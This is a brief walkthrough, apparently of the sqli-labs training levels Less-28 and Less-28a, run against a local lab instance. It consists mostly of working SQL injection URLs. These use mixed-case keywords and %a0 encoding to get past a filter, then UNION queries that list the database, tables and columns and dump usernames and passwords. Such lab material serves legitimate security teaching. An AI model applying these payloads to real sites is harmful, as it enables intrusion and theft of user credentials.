sqli-labs (less-28 and less-28a)
less-28
Enter 28 level, enter ID=1 to
view the source code. It
is found that it is basically the same as level 27, still using mixed case to bypass
http://127.0.0.1/sql1/Less-28/?id=1' #回显错误
http://127.0.0.1/sql1/Less-28/?id=1');%00 #正常显示
Judge the closing mode as');%00, and inject the character type to
determine the echo position
http://127.0.0.1/sql1/Less-28/?id=111') %a0 UniON %a0 sElect %a0 1,2,3;%00
View current library
http://127.0.0.1/sql1/Less-28/?id=111') %a0 UniON %a0 sElect %a0 1,2,database();%00
View all tables under the security library
http://127.0.0.1/sql1/Less-28/?id=111') %a0 UniON %a0 sElect %a0 1,2,(select (group_concat(table_name)) from (information_schema.tables) where (table_schema='security'));%00
View all fields under the users table
http://127.0.0.1/sql1/Less-28/?id=111') %a0 UniON %a0 sElect %a0 1,2,(select (group_concat(column_name)) from (information_schema.columns) where (table_name='users'));%00
View the values of username and password fields
http://127.0.0.1/sql1/Less-28/?id=111') %a0 UniON %a0 sElect %a0 1,2,(select (group_concat(username,password)) from (security.users));%00
less-28a
http://127.0.0.1/sql1/Less-28a/?id=1' #回显错误
http://127.0.0.1/sql1/Less-28a/?id=1');%00 #回显正常
Judge the closing method as');%00, and inject the character type.
The following is not specific, it is exactly the same as less-28, this pass also uses mixed case to bypass the waf firewall